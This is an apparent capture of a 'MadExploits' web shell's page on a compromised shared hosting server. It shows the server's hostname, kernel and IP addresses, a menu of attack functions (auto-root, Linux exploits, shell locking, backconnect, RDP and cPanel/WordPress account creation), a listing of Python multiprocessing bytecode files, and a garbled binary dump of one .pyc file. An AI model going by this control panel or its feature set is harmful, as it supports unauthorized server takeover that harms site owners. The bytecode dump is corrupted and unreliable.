Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.141.21.18
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
multiprocessing /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
566
B
-rw-r--r--
__init__.cpython-34.pyo
566
B
-rw-r--r--
connection.cpython-34.pyc
26.9
KB
-rw-r--r--
connection.cpython-34.pyo
26.54
KB
-rw-r--r--
context.cpython-34.pyc
13.22
KB
-rw-r--r--
context.cpython-34.pyo
13.22
KB
-rw-r--r--
forkserver.cpython-34.pyc
7.08
KB
-rw-r--r--
forkserver.cpython-34.pyo
6.97
KB
-rw-r--r--
heap.cpython-34.pyc
6.57
KB
-rw-r--r--
heap.cpython-34.pyo
6.33
KB
-rw-r--r--
managers.cpython-34.pyc
34.93
KB
-rw-r--r--
managers.cpython-34.pyo
34.32
KB
-rw-r--r--
pool.cpython-34.pyc
22.61
KB
-rw-r--r--
pool.cpython-34.pyo
22.3
KB
-rw-r--r--
popen_fork.cpython-34.pyc
2.4
KB
-rw-r--r--
popen_fork.cpython-34.pyo
2.35
KB
-rw-r--r--
popen_forkserver.cpython-34.py...
2.49
KB
-rw-r--r--
popen_forkserver.cpython-34.py...
2.49
KB
-rw-r--r--
popen_spawn_posix.cpython-34.p...
2.27
KB
-rw-r--r--
popen_spawn_posix.cpython-34.p...
2.27
KB
-rw-r--r--
popen_spawn_win32.cpython-34.p...
3
KB
-rw-r--r--
popen_spawn_win32.cpython-34.p...
2.94
KB
-rw-r--r--
process.cpython-34.pyc
8.72
KB
-rw-r--r--
process.cpython-34.pyo
8
KB
-rw-r--r--
queues.cpython-34.pyc
9.83
KB
-rw-r--r--
queues.cpython-34.pyo
9.74
KB
-rw-r--r--
reduction.cpython-34.pyc
7.6
KB
-rw-r--r--
reduction.cpython-34.pyo
7.55
KB
-rw-r--r--
resource_sharer.cpython-34.pyc
5.52
KB
-rw-r--r--
resource_sharer.cpython-34.pyo
5.48
KB
-rw-r--r--
semaphore_tracker.cpython-34.p...
3.64
KB
-rw-r--r--
semaphore_tracker.cpython-34.p...
3.6
KB
-rw-r--r--
sharedctypes.cpython-34.pyc
7.16
KB
-rw-r--r--
sharedctypes.cpython-34.pyo
7.09
KB
-rw-r--r--
spawn.cpython-34.pyc
6.92
KB
-rw-r--r--
spawn.cpython-34.pyo
6.87
KB
-rw-r--r--
synchronize.cpython-34.pyc
12.06
KB
-rw-r--r--
synchronize.cpython-34.pyo
11.74
KB
-rw-r--r--
util.cpython-34.pyc
9.43
KB
-rw-r--r--
util.cpython-34.pyo
9.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : semaphore_tracker.cpython-34.pyc
� e f� � @ s� d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l m Z d d l m Z d d d g Z Gd d � d e � Z e � Z e j Z e j Z e j Z e j Z d d � Z d S)� N� )�spawn)�util�ensure_running�register� unregisterc @ sX e Z d Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d S)�SemaphoreTrackerc C s t j � | _ d | _ d S)N)� threadingZLock�_lock�_fd)�self� r �F/opt/alt/python34/lib64/python3.4/multiprocessing/semaphore_tracker.py�__init__ s zSemaphoreTracker.__init__c C s | j � | j S)N)r r )r r r r �getfd! s zSemaphoreTracker.getfdc C s | j �� | j d k r d Sg } y | j t j j � � Wn t k rQ Yn Xd } t j � \ } } z yW | j | � t j � } | g t j � } | d | | g 7} t j | | | � Wn t j | � � Yn X| | _ Wd t j | � XWd QXd S)z�Make sure that semaphore tracker process is running. This can be run from any process. Usually a child process will use the semaphore created by its parent.Nz;from multiprocessing.semaphore_tracker import main;main(%d)z-c)r r �append�sys�stderr�fileno� Exception�os�piper Zget_executabler Z_args_from_interpreter_flagsZspawnv_passfds�close)r Zfds_to_pass�cmd�r�wZexe�argsr r r r % s* zSemaphoreTracker.ensure_runningc C s | j d | � d S)z2Register name of semaphore with semaphore tracker.ZREGISTERN)�_send)r �namer r r r C s zSemaphoreTracker.registerc C s | j d | � d S)z4Unregister name of semaphore with semaphore tracker.Z UNREGISTERN)r )r r r r r r G s zSemaphoreTracker.unregisterc C sw | j � d j | | � j d � } t | � d k rF t d � � n t j | j | � } | t | � k ss t � d S)Nz{0}:{1} �asciii z name too long) r �format�encode�len� ValueErrorr �writer �AssertionError)r r r �msg�nbytesr r r r K s zSemaphoreTracker._sendN) �__name__� __module__�__qualname__r r r r r r r r r r r s r c , C s� t j t j t j � t j t j t j � x= t j t j f D]) } y | j � Wq? t k rg Yq? Xq? Wt � } z� t | d � �� } x� | D]� } yg | j � j d � \ } } | d k r� | j | � n, | d k r� | j | � n t d | � � Wq� t k r4y t j t j � � Wn Yn XYq� Xq� WWd QXWd | r|y t j d t | � � Wq|t k rxYq|Xn xu | D]m } zc | j d � } y t j | � Wn<